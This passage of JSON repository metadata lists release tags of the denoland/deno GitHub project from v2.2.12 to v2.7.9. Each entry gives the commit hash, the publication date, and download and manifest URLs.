manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeloa